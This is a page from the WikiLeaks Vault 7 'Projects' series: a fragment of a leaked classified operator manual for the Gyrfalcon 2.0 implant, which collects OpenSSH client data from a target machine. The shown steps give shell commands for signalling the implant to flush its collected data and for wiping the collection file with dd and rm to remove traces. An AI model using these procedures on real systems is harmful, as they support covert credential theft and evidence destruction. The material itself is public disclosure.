Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
SECRET//NOFORN Gyrfalcon 2.0
4.1 ps -aux | grep client
4.2 (U) Where client is the name of the Gyrfalcon application on the target platform.
5. (S//NF) Flush the last of the OpenSSH client collected data through the Gyrfalcon application
pipeline into the compressed, encrypted collection file and reload the encrypted configuration
file with the new configuration.
5.1 kill -s HUP PID
5.2 (U) Where PID is the PID discovered in step 4.
5.3 (S//NF) IMPORTANT: this time you need to use SIGHUP signal to flush the pipeline and
read the new encrypted configuration file into memory. DO NOT use SIGUSR1 here.
5.4 (S//NF) It may take data arriving on the SYSV message queue for the application to
properly handle the HUP signal. Monitor the collection file – if the collection file is closed
then the HUP signal was handled correctly and it is safe to proceed.
6. (S//NF) Ensure the encrypted configuration file has been removed from the file system.
6.1 (S//NF) The application will securely unlink the encrypted configuration file from the file
system after successfully reading it into memory.
7. (S//NF) Download the compressed, encrypted collection file to the local operator computer.
7.1 (S//NF) Gyrfalcon does not provide any communication services between the local
operator computer and target platform. The operator must use another application to
download the collection file from the target platform.
8. (S//NF) Remove the compressed, encrypted collection file from the target platform's file system.
8.1 (S//NF) Hopefully, the decision was made to keep the collection file in the JQC/KitV
hidden directory.
8.2
dd if=/dev/zero of=./collect_file bs=64
8.3 rm -f collect_file
14 SECRET//NOFORN//20381126 November 2013